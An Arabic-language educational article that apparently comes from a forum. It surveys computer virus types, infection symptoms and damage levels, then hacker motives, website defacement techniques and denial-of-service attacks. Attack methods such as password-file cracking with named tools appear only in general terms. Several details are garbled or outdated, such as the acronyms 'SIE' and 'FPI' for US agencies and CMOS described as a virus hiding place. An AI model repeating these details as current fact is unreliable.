    تقبع فيروسات قطاع الإقلاع في أماكن معينة على القرص الصلب ضمن جهازك، وهي الأماكن التي يقرؤها الكمبيوتر وينفذ التعليمات المخزنة ضمنها عند الإقلاع. وتصيب هذه الفيروسات منطقة قطاع الإقلاع الخاصة بنظام DOS (DOS Boot Record) بينما تصيب فيروسات الفئة الفرعية المسماه MBR Viruses، قطاع الإقلاع الرئيسي للكمبيوتر Master Boot Record حيث يقرأ الكمبيوتر كلا المنطقتين السابقتين من القرص الصلب عند الإقلاع مما يؤدي إلي تحميل الفيروس في الذاكرة. يمكن للفيروسات أن تصيب قطاع الإقلاع على الأقراص المرنة، لكن الأقراص المرنة النظيفة والمحمية من الكتابة تبقى أكثر الطرق أمناً لإقلاع النظام في حالات الطوارئ. والمشكلة التي يواجهها المستخدم بالطبع هي كيفية التأكد من نظافة القرص المرن، أي خلوه من الفيروسات قبل استخدامه في الإقلاع وهذا ما تحاول أن تفعله برامج مكافحة الفيروسات.
    الفيروسات الطفيلية
    تلصق الفيروسات الطفيلية Parasitic Viruses نفسها بالملفات التنفيذية، وهي أكثر أنواع الفيروسات شيوعاً. وعندما يعمل أحد البرامج الملوثة فإن هذا الفيروس عادة ينتظر في الذاكرة إلي أن يشغل المستخدم برنامجاً آخر، فيسرع عندها إلي تلويثه. وهكذا يعيد هذا النوع من الفيروس إنتاج نفسه ببساطة من خلال استخدام الكمبيوتر بفعالية أي بتشغيل البرامج! وتوجد أنواع مختلفة من ملوثات الملفات لكن مبدأ عملها واحد.
    الفيروس المتطور Polymorphic Virus
    هي فيروسات متطورة نوعاً ما تغير الشفرة كلما انتقلت من جهاز إلي آخر. ويصعب نظرياً على مضادات الفيروسات التخلص منها لكن عملياً ومع تطور المضادات فالخطر أصبح غير مخيف.
    فيروسات الماكرو
    يعتبر هذا النوع من الفيروسات أحدث ما توصلت إليه التقنية في هذ ا المجال، وغدت تشكل تهديداً كبيراً لأسباب عديدة هي:
    1- تكتب فيروسات الماكرو بلغة Word المتوفرة لكثير من المستخدمين، وهي أسهل من لغات البرمجة التقليدية.
    2- أول فيروسات من نوعها تصيب ملفات البيانات أكثر من الملفات التنفيذية وهنا يكمن الخطر، حيث أن نسبة تداول ملفات البيانات أكبر بكثير من الملفات التنفيذية إذا أضفنا لذلك أيضاً البريد الإلكتروني وإمكانية إلحاق ملفات البيانات معها، وكذلك الاستخدام غير المحدود لشبكة الإنترنت. لذلك كله يكون خطر فيروسات الماكرو أشد وأكبر من خطر الفيروسات التقليدية.
    3- هذا النوع من الفيروسات لا يتقيد بنظام تشغيل معين، فهناك مثلاً إصدارات من برنامج Word الشهير لأنظمة Windows باختلاف نكهاتها، مما يجعل إمكانية الإصابة بهذا النوع من الفيروسات أكبر. وليست فيروسات الماكرو حكراً على برنامج Word، فهناك فيروسات تصيب برنامج Word Pro من Lotus ولكنها لا تكون متعلقة بالوثيقة كما هي الحال في برنامج "Word" وإنما في ملف منفصل. وهناك أنواع أخرى كثيرة من الفيروسات التي تصيب نوعاً معيناً من الملفات حسب أسمائها أو أنواعها ويضيق المجال هنا عن ذكرها وخاصة أن انتشارها بات محدوداً جداً.
    أعراض الإصابة بالفيروس
    تصاحب الأعراض التالية ظهور الفيروس وتعتبر علامات الإصابة به:
    1- نقص شديد في الذاكرة للذاكرة ثلاث حالات.. فقبل دخول الفيروس تكون الذاكرة في حالة طبيعية. ثم بعد أن يبدأ الفيروس في العمل يلاحظ نقص شديد في الذاكرة. وذلك لأن الفيروس في هذه الحالة يبدأ في تدمير الذاكرة وكذلك ملفات التبادل Swap Files عن طريق إزالة البيانات المخزنة، مما ينتج عنه توقف البرنامج العامل في الوقت ذاته لعدم وجود أي بيانات في الذاكرة، وإنما يستبدلها الفيروس بمجموعة من الأصفار في مكان تعليمات التشغيل. أما الحالة الثالثة, بعد أن يكرر الفيروس نفسه يحتل الذاكرة.
    2-بطء تشغيل النظام بصورة مبالغ فيها.
    3عرض رسائل الخطأ بدون أسباب حقيقية.
    4-تغيير في عدد ومكان الملفات وكذلك حجمها بدون أي أسباب منطقية.
    5-الخطأ في استخدام لوحة المفاتيح عن طريق إظهار أحرف غريبة أو خاطئة عند النقر على حرف معين.
    6-توقف النظام بلا سبب.
    7-استخدام القرص الصلب بطريقة عشوائية. وتستطيع أن تلاحظ ذلك من إضاءة لمبة القرص الصلب حتى وإن كان لا يعمل.
    8-إختلاط أدلة القرص أو رفض النظام العمل منذ البداية.
    إستراتيجية الهجوم للفيروس
    أهداف هامة يجب عليه أن ينجزها وهي إما أن تكون برنامجاً أو ملفاً معيناً. وهدف الهجوم يختلف من فيروس إلي آخر وأيضاً حسب نظام التشغيل.
    أماكن الفيروس الإستقرارية
    يبحث الفيروس عن أهداف يضمن وجودها في أي نظام تشغيل وهي التي لا يستطيع أي نظام أن يعمل بدونها. وفي نظام Windows أو أي إصدار من أي نظام تشغيل آخر يعتمد على DOS فإن الملف المستهدف دائماً من قبل الفيروسات هو COMMAND.COM. وذلك لأن الملف موجود دائماً في الدليل الرئيسي للفهرس الخاص بالنظام حيث أن هذا الملف هو المسئول عن استقبال أوامر التشغيل التي تدخلها وتقرير تنفيذها إن كانت من أوامر التشغيل الداخلية أو من أوامر التشغيل الأخرى التي تنتهي بالامتدادات COM, EXE, BAT . . وفيروسات هذا النوع أكثر تنوعاً من فيروسات قطاع بدء التشغيل .
    تصنيف فيروسات البرامج في أربع مجموعات:
    الفيروسات المتطفلة: وهي التي تلصق نفسها بالملفات لكي تتكاثر وتبقي الملف الأصلي بحالة سليمة في الغالب.
    الفيروسات المرافقة: تعتمد على قاعدة الأسبقية في التنفيذ للملفات COM. وتتمكن من نقل العدوى عن طريق إنشاء ملف جديد بدون تغيير طول الملف.
    الفيروسات الرابطة: تصيب البرامج بتغيير المعلومات في جدول مواقع الملفات FAT بحيث تبدأ البرامج المصابة من الموقع ذاته، وهو عادة الـ Cluster الأخير في القرص والذى يتضمن نص الفيروس، مما يضمن له انتشاراً سريعاً كما في فيروس DIRII.
    الفيروسات المستبدلة: تقوم بالكتابة فوق جزء من البرنامج بدون تغيير حجم الملف، مما يؤدي إلي فشل البرنامج عند تنفيذه كما في فيروس BURGER405. وهناك حيلة طريفة يلجأ إليها بعض المبرمجين الأذكياء. بتغيير إسم هذا الملف لكي يصعب على الفيروس ربط نفسه به. وهناك أيضاً ملفات SYS, CONFIG, BAT, AUTOEXEC حيث يبحث النظام عنها عند بدء التشغيل وينفذ ما بها من تعليمات. وهناك ملفات أخرى تمثل إغراء أكثر جاذبية للفيروس وهي: IBMBIO.COM, IBMDOS.COM لأنها ملفات مخفية فبالرغم من وجودها في الفهرس الرئيسي إلا إنه يصعب اكتشاف الفيروس عند عرض دليل الملفات. ومن أماكن الفيروسات المفضلة مخزن COMS. وهو مكان في الذاكرة يتم عن طريقه ضبط ساعة النظام. وهذا المكان في منتهى الخطورة لأنه:
    توجد به طاقة عن طريق البطاريات التي تستخدم في المحافظة على توقيت النظام حتى بعد أن يتم إغلاق الكمبيوتر.
    لأنها أول مكان يتم تشغيله عند بدء التشغيل. كما أن هذا المكان لا يظهر عند عرض الملفات بالأمر DIR.
    عن طريق هذا المكان يحدد الفيروس توقيت تشغيله متى حانت ساعة الصفر. المكان الآخر الذي يمكن للفيروسات إصابته والاستقرار فيه هو ملفات البرامج وخاصة الملفات التنفيذية من نوع COM. و EXE. أو SYS. وغيرها .
    أشكال الفيروسات
    تظهر الفيروسات في عالم الكمبيوتر بأشكال عديدة أهمها:
    1-السريع
    بمجرد دخول هذا النوع من الفيروسات إلي الكمبيوتر يصيب كل الملفات التي يتم تنفيذها في ذلك الوقت، وهي ليست خطيرة كثيراً كما يمكن أن يتخيل البعض، فالتخلص منها سهل للغاية، حيث تقوم معظم برامج حماية الفيروسات بفحص الذاكرة الرئيسة بشكل دوري، ومن الطبيعي أن يكون الفيروس السريع متواجداً هناك، إذ يصيب كل الملفات الموجودة في الذاكرة، عندها يتم اكتشافه من قبل برنامج الحماية فإنه يتخلص منه.
    2-البطيء
    تتلخص فكرة هذا النوع من الفيروسات أنه كلما كان انتشاره بطيئاً صعب اكتشافه والتخلص منه سريعاً. وهناك العديد من الطرق التي يمكن أن يعمل بها، ولكن الأسلوب التقليدي الذي يعمل به الفيروس البطيء هو إصابة الملفات التي كنت تنوي تعديلها، مما يعني إنه لو كنت تشغل كاشف للتغييرات كحماية ضد الفيروسات، يخبرك عندها أن هناك إصابة وتغيير في أحد الملفات، ولكن بما أنك قررت عمل تغييرات في ذلك الملف أصلاً فستوافق على ذلك، وتتقبل الفيروس بكل طيب خاطر. وعندما تنسخ ملفاً على قرص مرن، يكون ذلك الملف معطوباً أصلاً، وعند نسخه على كمبيوتر آخر محمي ببرامج الحماية ضد الفيروسات وبكاشف التغييرات على الملفات الذي يحذرك من التغيير الذي طرأ على الملف الأصلي فتؤكد له معرفتك بذلك ظاناً أنه يعطيك تحذيراً على التغييرات التي قمت أنت بها، وتكون النتيجة إصابة الكمبيوتر الثاني بالفيروس.
    3-المتسلل
    هو ذلك الفيروس الذي يختبئ في الذاكرة الرئيسية ويسيطر على المقاطعات. يكون لكل جهاز طرفي رقم معين من قبل المعالج الرئيسي يسمى مقاطع، مهمته تنسيق التخاطب بين الأجهزة الطرفية المختلفة داخل الكمبيوتر. ففي حالة الفيروس الذي يصيب مقطع التشغيل فإنه يسيطر على مقاطع القراءة/الكتابة على القرص الصلب رقم 13h، وإن كان متسللاً فإن أي برنامج يحاول القراءة من مقطع التشغيل يقوم الفيروس بقراءة المعلومات الأصلية التي قام بتخزينها في مكان آخر بدلاً من المعلومات المعطوبة في مقطع التشغيل، ولا يشعر المستخدم بأي تغيير ولا يتمكن من لمس الفرق.
    4-متعدد الأشكال
    تعتبر برامج حماية الفيروسات التي تستخدم تقنية مسح الذاكرة بحثاً عن الفيروسات هي الأكثر شيوعاً في العالم، لذلك تكون هذه البرامج هي التحدي لكل مبرمج للفيروسات يحاول التغلب عليه. لذا وجدت الفيروسات متعددة الأشكال، التي لو تمت مقارنة نسختين من الفيروس نفسه معاً لم تتطابقا. وهذا يصعب مهمة برامج الحماية ويتطلب منها القيام بأمور مختلفة أكثر تعقيداً لاكتشاف هذا النوع من الفيروسات.
    الدمار الذي تخلفه الفيروسات
    يمكننا تصنيف الدمار الذي تخلفه الفيروسات في ست مجموعات وفقاً لحجم الدمار. ويمكننا أن نعرف الدمار الناتج عن الفيروسات بأنه تلك الأمور التي كنت تتمنى لو أنها لم تحصل أبداً، كما يمكن أن نقيس حجم الدمار بالوقت الذي تستغرقه عملية إعادة الأمور إلي ما كانت عليه سابقاً. ولا نأخذ في الحسبان هنا الدمار الحاصلً عن محاولات المستخدم غير السليمة في التخلص من الفيروس، خاصة وأن الحل الذي ينصح به الكثير من قليلي الخبرة هو تهيئة القرص الصلب كاملاً Format، وهو الغاية التي سعى إليها صانع الفيروس ألا وهي تدمير بياناتك كاملة، أما الطريف في الأمر أن الفيروسات التي تصيب مقطع التشغيل لا تتأثر بتلك العملية وتبقى موجودة على القرص الصلب.
    وأنواع هذا الدمار كما يلى:
    1-دمار تافه
    وهو ما تسببه بعض الفيروسات غير ا الضار كثيراً، فمنها ما يسبب صدور صوت عن لوحة المفاتيح في تاريخ معين، فكلما ضغطت على زر ما في لوحة المفاتيح صدر ذلك الصوت. وكل ما يتوجب عليك عمله هو التخلص من ذلك ا لفيروس الذى لا يستغرق دقائق.
    2-دمار ثانوي
    قد يكون أفضل مثال يوضح هذا الموضوع هو ما تقوم به بعض الفيروسات من شطب أي برنامج تقوم بتشغيله بعد أن تنسخ نفسها في الذاكرة، وفي أسوأ الاحتمالات هنا، يكون عليك عادة تركيب بعض البرامج التي فقدتها ولا يستغرق ذلك في المجمل أكثر من نصف ساعة عمل .
    3-دمار معتدل
    إذ ا قام الفيروس بتهيئة القرص الصلب أو حتى بشطبه كاملاً، فإن حجم الدمار هنا يكون هيناً، وذلك لأننا نعرف أن ذلك قد حدث، ويكون بإمكاننا إعادة تثبيت نظام التشغيل وإعادة تحميل النسخ الإحتياطية التي تم نسخها بالأمس، لأنه من الطبيعي عمل نسخ احتياطية يومياً. لذلك تكون مجمل الخسائر نصف يوم عمل وربما ساعة من إعادة التثبيت والتحميل.
    4-الدمار الكبير
    عندما يصيب الفيروس القرص الصلب والنسخ الإحتياطية معاً فتلك الطامة الكبرى، إذ تقوم بالتخلص من الفيروس من القرص الصلب وتنسخ ملفاتك الإحتياطية لتجد أن الفيروس رجع من جديد. وتكون المصيبة كبرى هنا إذا لم يكن لديك ورق مطبوع من عملك يمكنك إعادة إدخاله، عندئذ عليك إعادة العمل من البداية.
    5-الدمار الخطير
    يكون الدمار خطيراً عندما يقوم الفيروس بتغييرات تدريجية ومتوالية، وتصاب النسخ الإحتياطية هنا أيضاً، وتكون تلك التغييرات غير مرئية للمستخدم. ولا يستطيع المستخدم عندها معرفة إن كانت بياناته صحيحة أم تم تغييرها.
    6-الدمار غير المحدود
    تقوم بعض الفيروسات بالحصول على كلمات سر الدخول لمدير النظام وتمريرها إلي طرف آخر، وفي هذه الحالة لا يمكن التنبؤ بمقدار الضرر الحادث. ويكون الشخص الذي حصل على كلمة السر متمتعاً بكامل صلاحيات مدير الشبكة أو النظام، مما يمكنه من الدخول إلي النظام وعمل ما يريد.
    ماذا تتوقع من الفيروسات
    1-تباطؤ أداء الكمبيوتر، أو حدوث أخطاء غير معتادة عند تنفيذ البرنامج .
    2-زيادة حجم الملفات، أو زيادة زمن تحميلها إلي الذاكرة .
    3-سماع نغمات موسيقية غير مألوفة .
    4-ظهور رسائل أو تأثيرات غريبة على الشاشة .
    5-زيادة في زمن قراءة القرص إذا كان محمياً وكذلك ظهور رسالة FATALI/O ERROR.
    6- تغيير في تاريخ تسجيل الملفات كما في فيروس Vienna الذي يكتب 62 مكان الثواني.
    7-حدوث خلل في أداء لوحة المفاتيح كأن تظهر رموز مختلفة عن المفاتيح التي تم ضغطها كما في فيروس Haloechon أو حدوث غلق للوحة المفاتيح كما في فيروس Edv
    8-نقص في مساحة الذاكرة المتوفرة كما في فيروس Ripper الذي يحتل 2 كيلو بايت من أعلى الذاكرة الرئيسية. ويمكن كشف ذلك بواسطة الأمر MEM أوCHKDSK
    9-ظهور رسالة ذاكرة غير كافية لتحميل برنامج كأن يعمل سابقاً بشكل عادي.
    10-ظهور مساحات صغيرة على القرص كمناطق سيئة لا تصلح للتخزين كما في فيروس Italan وفيروس Ping Pong اللذين يشكلان قطاعات غير صالحة للتخزين مساحاتها كيلوبايت واحد.
    11-تعطيل النظام بتخريب قطاع الإقلاع BOOT SECTOR.
    12-إتلاف ملفات البيانات مثل ملفات Word و Excel وغيرها.
    دورة نشاط الفيروسات
    1-بداية العدوى والإنتقال.
    2-مرحلة التكاثر.
    3-مرحلة السكون.
    4-مرحلة النشاط والتخريب.
    كيف تنتقل الفيروسات و تصيب الأجهزة
    1-تشغيل الجهاز بواسطة اسطوانة مرنة مصابة.
    2-تنفيذ برنامج في اسطوانة مصابة.
    3-نسخ برنامج من اسطوانة مصابة بالفيروس إلي الجهاز.
    4-تحميل الملفات أو البرامج من الشبكات أو الإنترنت.
    5-تبادل البريد الإلكتروني المحتوي على الفيروسات.
    الإجراءات الواجبة عند اكتشاف الإصابة بالفيروسات
    1-تصرف بهدوء وبدون استعجال لئلا تزيد الأمر سوءاً ولا تبدأ بحذف الملفات المصابة أو تهيئة الأقراص.
    2-لا تباشر القيام بأي عمل قبل إعداد وتدقيق خطة العمل التي تبين ما ستقوم به بشكل منظم.
    3-أعد تشغيل جهازك من قرص نظام مأمون ومحمي وشغل أحد البرامج المضادة للفيروسات التي تعمل من نظام DOS ومن قرص لين ولا تشغل أي برنامج من قرصك الصلب.
    4-افحص جميع الأقراص اللينة الموجودة لديك مهما كان عددها لعزل الأقراص المصابة من السليمة.
    تابع--->فى الوقاية من الفيروسات

    __________________________________________________ ____________
    أعرف من هم المخترقون
    ________________________________________

    المخـــــترقون

    (الهاكرز ******* والكراكرز Crackers )
    الإختراق بشكل عام هو القدرة على الوصول لهدف معين بطريقة غير مشروعة عن طريق ثغرات في نظام الحماية الخاص بالهدف وبطبيعة الحال هي سمة سيئة يتسم بها المخترق لقدرته على دخول أجهزة الآخرين عنوة ودون رغبة منهم وحتى دون علم منهم بغض النظر عن الأضرار الجسيمة التي قد يحدثها عند سحبه ملفات وصور تخصهم وحدهم.
    أسباب الإختراق ودوافعه
    لم تنتشر هذه الظاهرة لمجرد العبث وإن كان العبث وقضاء وقت الفراغ من أبرز العوامل التي ساهمت في تطورها وبروزها إلي عالم الوجود. وقد أجملناالدوافع الرئيسية للإختراق في ثلاث نقاط نوجزها على النحو التالي:
    1- الدافع السياسي والعسكري
    مما لاشك فيه أن التطور العلمي والتقني أديا إلي الاعتماد بشكل شبة كامل على أنظمة الكمبيوتر في أغلب الاحتياجات التقنية والمعلوماتية. فمنذ الحرب الباردة والصراع المعلوماتي والتجسسي بين الدولتين العظميين على أشده. ومع بروز مناطق جديدة للصراع في العالم وتغير الطبيعة المعلوماتية للأنظمة والدول، أصبح الاعتماد كلياً على الحاسب الآلي وعن طريقه أصبح الإختراق من أجل الحصول على معلومات سياسية وعسكرية واقتصادية مسألة أكثر أهمية.
    2- الدافع التجاري
    من المعروف أن الشركات التجارية الكبرى تعيش هي أيضاً فيما بينها حرباً مستعرة وقد بينت الدراسات الحديثة أن عددا من كبريات الشركات التجارية يجرى عليها أكثر من خمسين محاولة إختراق لشبكاتها كل يوم.
    3- الدافع الفردي
    بدأت أولى محاولات الإختراق الفردية بين طلاب الجامعات بالولايات المتحدة كنوع من التباهي بالنجاح في إختراق اجهزة شخصية لأصدقائهم ومعارفهم وما لبثت أن تحولت تلك الظاهرة إلي تحد فيما بينهم في اختراق الأنظمة بالشركات ثم بمواقع الإنترنت. ولا يقتصر الدافع على الأفراد فقط بل توجد مجموعات ونقابات أشبه ما تكون بالأندية وليست بذات أهداف تجارية. بعض الأفراد بشركات كبرى بالولايات المتحدة ممن كانوا يعملون مبرمجين ومحللي نظم تم تسريحهم من أعمالهم للفائض الزائد بالعمالة فصبوا غضبهم على أنظمة شركاتهم السابقة مقتحموها ومخربوها كل ما تقع أيديهم عليه من معلومات حساسة بقصد الانتقام. وفي المقابل هناك هاكرز محترقون تم القبض عليهم بالولايات المتحدة وبعد التفاوض معهم تم تعيينهم بوكالة المخابرات الأمريكية SIE وبمكتب التحقيقات الفيدرالي FPI وتركزت معظم مهامهم في مطاردة الهاكرز وتحديد مواقعهم لإرشاد الشرطة إليهم.
    أنواع الإختراق
    يمكن تقسيم الإختراق من حيث الطريقة المستخدمة إلي ثلاثة أقسام:
    1- إختراق المزودات أو الأجهزة الرئيسية للشركات والمؤسسات أو الجهات الحكومية وذلك باختراق الجدران النارية التي عادة توضع لحمايتها وغالباً ما يتم ذلك باستخدام المحاكاة Spoofing, وهو مصطلح يطلق على عملية انتحال شخصية للدخول إلي النظام حيث أن حزم الـ IP تحتوي على عناوين للمرسل والمرسل إليه وهذه العناوين ينظر إليها على أنها عناوين مقبولة وسارية المفعول من قبل البرامج وأجهزة الشبكة. ومن خلال طريقة تعرف بمسارات المصدر Source Routing فإن حزم الـ IP قد تم إعطاؤها شكلاً تبدو معه وكأنها قادمة من كمبيوتر معين بينما هي في حقيقة الأمر ليست قادمة منه وعلى ذلك فإن النظام إذا وثق بهوية عنوان مصدر الحزمة فإنه يكون بذلك قد حوكي (خدع) وهذه الطريقة هي ذاتها التي نجح بها مخترقو الـ Hotmail في الدخول إلي معلومات النظام من قبل.
    2- إختراق الأجهزة الشخصية والعبث بما تحتويه من معلومات .
    3- التعرض للبيانات أثناء انتقالها والتعرف على شفرتها إن كانت مشفرة وهذه الطريقة تستخدم في كشف أرقام بطاقات الائتمان وكشف الأرقام السرية للبطاقات البنكيه ATM وفي هذا السياق نحذر من أمرين لا يتم الاهتمام بهما بشكل جدي وهما عدم كشف أرقام بطاقات الائتمان لمواقع التجارة الإلكترونية إلا بعد التأكد بالتزام تلك المواقع بمبدأ الأمان.والثاني أنه عند استخدام بطاقة السحب الآلي من ماكينات البنوك النقدية ATM فإن المستخدم لاينتظر خروج السند الصغير المرفق بعملية السحب أو أنه يلقي به في أقرب سلة للمهملات دون أن يكلف نفسه عناء تمزيقه جيداً. ولو نظرنا إلي ذلك المستند سنجد أرقاما تتكون من عدة خانات طويلة للشريط الممغنط الظاهر بالجهة الخلفية لبطاقة الـ ATM وهذا الشريط هو حلقة الوصل بيننا وبين رصيدنا بالبنك الذي من خلاله تتم عملية السحب النقدي.
    آثار الإختراق
    1- تغيير الصفحة الرئيسية لموقع الويب كما حدث لموقع فلسطيني مختص بالقدس حيث غير بعض الشباب الإسرائيلي الصور الخاصة بالقدس إلي صور تتعلق بالديانة اليهودية بعد عملية إختراق مخطط لها.
    2- السطو بقصد الكسب المادي كتحويل حسابات البنوك أو الحصول على خدمات مادية أو أي معلومات ذات مكاسب مادية كأرقام بطاقات الائتمان والأرقام السرية الخاصة ببطاقات الـ ATM.
    3- اقتناص كلمات السر التي يستخدمها الشخص للحصول على خدمات مختلفة كالدخول إلي الإنترنت.
    إختراق المواقع و طرق الوقاية
    ماذا سيكون رد فعلك، إذا دخلت إلي موقع أحد الشركات التجارية الكبرى، أو أحد مواقع الإنترنت الحكومية، بقصد الحصول على بيانات رسمية معينة، وإذ برسالة بذيئة تطالعك في الصفحة الرئيسية من هذا الموقع؟! حدث ذلك مئات المرات.. فقد وقعت عشرات من عمليات اختراق مزودات ويب نفذتها مجموعات مختلفة من المخترقين في مناطق عديدة من العالم. وهدف بعضها إلي تشويه مواقع ويب Defacement وذلك بتغيير الصفحة الرئيسية فيها وتمثل بعضها الآخر في هجمات حجب الخدمة الموزعة التي هدفت كما أشار المحللون، إلي تدمير شبكة الإنترنت بالكامل! وكانت مواقع ويب حكومية عربية ضحية عدد كبير نسبياً من تلك العمليات.
    تشويه مواقع الويب
    تشويه مواقع الويب ليست سوى تغيير الصفحة الرئيسية للموقع بصفحة أخرى يعلن المخترق فيها انتصاره على نظام مزود ويب والإجراءات الأمنية للشبكة،
    وتقتصر الأضرار التي تسببها عمليات تشويه مواقع ويب على الإضرار بسمعة الجهة المالكة للموقع، حيث يتم تغيير الصفحة الرئيسية فقط من الموقع بصفحة HTML من تصميم المخترق . ولا يلجأ المخترقون عادةً في عمليات التشويه إلي تدمير محتويات الموقع حيث يمكنك في أغلب المواقع التي تتعرض لعمليات التشويه الوصول إلي جميع الصفحات المكونة للموقع إذا كنت تعلم عنوان الصفحة كاملاً.
    كيف تحدث عمليات تشويه مواقع الويب؟
    يتبع المخترقون أساليب عدة في عمليات تشويه صفحات ويب. وتختلف هذه الأساليب من موقع إلي آخر بناءاً على نوع نظام التشغيل، ومزود ويب الذي يعتمد عليه الموقع. ونوضح هنا أكثر هذه الأساليب انتشاراً:
    ü الدخول بهوية مخفية Anonymous عبر منفذ بروتوكول FTP، وتمكن هذه الطريقة المخترق في بعض الحالات من الحصول على ملف كلمة الدخول المشفرة الخاصة بأحد المشرفين على الشبكة أو من يملكون حق تعديل محتويات الموقع والعمل على فك تشفيرها حيث يتم إرسال كلمة السر مشفرة في مختلف المزودات. لكن هذه الشفرة تظهر في بعض المزودات ضمن ملف كلمة السر ويظلل البعض الآخر من المزودات هذه الكلمة بعد تشفيرها (أي يظهر حرف x مكان كل رمز من الكلمة المشفرة). وتصعب الحالة الأخيرة على المخترقين عملية كسر الشفرة. ويلجأ المخترقون بعد الحصول على ملف كلمة السر إلي استخدام برامج خاصة لتخمين كلمات السر. ومن أكثر هذه البرامج انتشاراً: Cracker Jack، وJohn The Ripper، وJack The Ripper، و Brute Force Cracker. وتعمل هذه البرامج على تجربة جميع الإحتمالات الممكنة لكلمة السر من حروف وأرقام ورموز، لكنها تستغرق وقتاً أطول في التوصل إلي هذه الكلمة إذا احتوت على عدد أكبر من الرموز. وقد تصل الفترة التي تتطلبها هذه البرامج للتوصل إلي كلمة السر إلي سنوات بناءاً على عدد الرموز المستخدمة والنظام المستخدم في عمليات التخمين. وننصح باستخدام كلمة سر طويلة نسبياً وتغييرها خلال فترات متقاربة .
    ü استغلال الثغرات الأمنية في مزودات ويب وأنظمة التشغيل, التي يستغلها في عمليات الإختراق إلي أن تجد الشركة المصممة للنظام الحل المناسب لها. وننصح لذلك جميع مدراء ومشرفي الشبكات بمتابعة مواقع الشركات المصممة لنظم التشغيل ومزودات ويب للإطلاع على آخر ما تم التوصل إليه من ثغرات أمنية وجلب برامج الترقيع patches لها حيث تحرص هذه الشركات على تقديم مثل هذه البرامج بأسرع وقت ممكن.
    ü استخدام بروتوكول Telnet, حيث تسمح كثير من الثغرات الأمنية في الأنظمة المختلفة سواء كانت UNIX أو Windows أو غيرها، باستخدام تطبيقات تعتمد على بروتوكول Telnet الذي يسمح بالوصول إلي أجهزة الكمبيوتر عن بعد وتنفيذ الأوامر عليها.
    تاريخ عمليات تشويه صفحات الويب
    بلغ عدد عمليات تشويه صفحات الويب التي رصدت في أنحاء العالم منذ العام 1995 وحتى الآن حوالي 5000 عملية توزعت على مختلف مواقع ويب التي تملك أسماء نطاقات تجارية com و net و org ونطاقات محلية في جميع دول العالم تقريباً. وتشير الدراسات إلي أن حوالي 20 % من عمليات التشويه تتم يوم الأحد. ويرجح السبب في ذلك إلي أن تغيير الصفحة الرئيسية في موقع معين يوم العطلة الأسبوعية (في معظم دول العالم) يضمن بقاء التغيير أطول مدة ممكنة إلي أن يعود مدير الشبكة وموظفو الشركات من إجازتهم ويرجعوا الصفحة الأصلية للموقع إلي ما كانت. وحدثت أوائل عمليات التشويه في العالم عام 1995 ولم تتعد في ذلك الوقت أربع عمليات. وتلتها 18 عملية عام 1996 و 28 عملية عام 1997 ثم تضاعفت عام 1998 عشر مرات ليصل العدد إلي 233 عملية. وانتشرت حمى تشويه مواقع الإنترنت عام 1999 ليتضاعف عددها حوالي 15 مرة وليبلغ 3699 عملية تشويه في مختلف أنحاء العالم ومن ضمنها 16 عملية تمت على مواقع محلية في الدول العربية!
    هجمات حجب الخدمة
    "الوصول إلي هذا الموقع غير ممكن!"
    تعني الرسالة السابقة أن الموقع الذي تحاول أن تزوره تعرض لهجمات حجب الخدمة خاصة إذا كان واحداً من المواقع الكبرى التي يعني ظهور مثل هذه الرسالة في موقعها خسارة عشرات الآلاف من الدولارات!
    يكمن الفرق بين عمليات التشويه وبين هجمات حجب الخدمة Denial Of Service أن الأولى تتم عن طريق اختراق مزودات ويب وتتم الثانية عن طريق توجيه جهة معينة حزم بيانات شبكية بصورة كثيفة جداً إلي هذه المزودات بهدف إيقافها عن العمل. ويعتبر القيام بمثل هذه الهجمات سهلاً للغاية حيث يوجد عدد كبير من البرامج التي يمكن استخدامها لتوجيه الطلبات والحزم الشبكية إلي هدف محدد كموقع إنترنت أو عنوان IP. اعتمدت أولى هجمات حجب الخدمة التي ظهرت في العالم على توجيه طلبات كثيفة باستخدام بروتوكول رسائل التحكم بإنترنت I CMP (Internet Control Message Protocol) الذي يسمح بتبادل رسائل التحكم والتعامل مع رسائل الخطأ بين مزودات ويب. وتحدث هذه الهجمات اليوم، باستخدام منافذ بروتوكولات TCP و UDP بالإضافة إلي ICMP في تسليط سيل من الرزم الشبكية إلي مزودات معينة عبر أوامر مثل Ping. ومن أشهر الهجمات تلك التي تستخدم نوع الهجوم المعروف باسم WinNuke والتي تسلط سيلاً من الحزم الشبكية عبر المنفذ 139 من نظام NetBIOS الذي يسمح بتحاور التطبيقات الموجودة على الأجهزة المرتبطة بالشبكة. وتوجد بالإضافة إلي ما سبق عشرات الطرق التي يمكن اتباعها لدفع الحزم أو الطلبات الشبكية إلي مزودات معينة لإيقافها عن العمل سواء كانت مزودات ويب أو مزودات بريد إلكتروني أو أي مزود يمكنه أن يستقبل الحزم الشبكية. وتعرف أنواع هذه الهجمات بأسماء غريبة منها: SYN و Smurf و Floods وLand و Ping Bomb وPing O'Death وFraggle بالإضافة إلي Winnuke المذكور سابقاً. ورغم سهولة القيام بمثل هذه الهجمات إلا أن توقعها أو صدها صعب جداً! لكن ما دوافع هذه الهجمات؟! توجد عدة أهداف قد تدفع جهة معينة أو شخصاً معيناً إلي القيام بمثل هذه الهجمات وأهمها:
    1-التسلل إلي النظام: حيث يمكن أن يتمكن بعض المخترقين من التسلل إلي النظام وقت انهياره وحجبه عن الخدمة أو وقت إعادة إقلاعه.
    2- أسباب سياسية: فقد توجه جهة معينة مثل هذه الهجمات إلي موقع حكومي يتبع دولة تعاديها أو موقع شركة تنتمي إلي هذه الدولة.
    3- أسباب اقتصادية: قد توجه شركة صغيرة مثل هذه الهجمات إلي شركة كبيرة تسيطر على السوق في نوع من المنافسة التجارية غير الشريفة!
    4- الإنتقام: يحدث كثيراً أن تسرح شركة أحد الموظفين المسئولين عن إدارة الشبكة. وقد يلجأ بعض هؤلاء إذا ما شعروا بالظلم إلي الإنتقام من الشركة!
    5- الطبيعة التخريبية: يلجأ بعض الأشخاص إلي مثل هذه الهجمات لإشباع رغبات تخريبية تتملكهم!
    أكبر عملية حجب خدمة في تاريخ الإنترنت
    تعتبر هجمات حجب الخدمة الموزعة Distributed Denial of Service (DDoS) نوعاً جديداً من هجمات حجب الخدمة العادية التي تعتمد على استخدام برامج معينة في الهجوم. وهذا النوع من الهجمات، هو الذي استخدم في الهجوم على كبرى مواقع الإنترنت مثل ZDNet وYahoo! و eBay و Amazon وCNN وغيرها. وتعتمد هذه الهجمات على تجنيد أجهزة كمبيوتر متصلة بالإنترنت، بدون علم مالكيها وتوجيهها إلي بث الرزم الشبكية إلي مزود معين بهدف إيقافه عن العمل نتيجة ضغط البيانات المستقبلة.
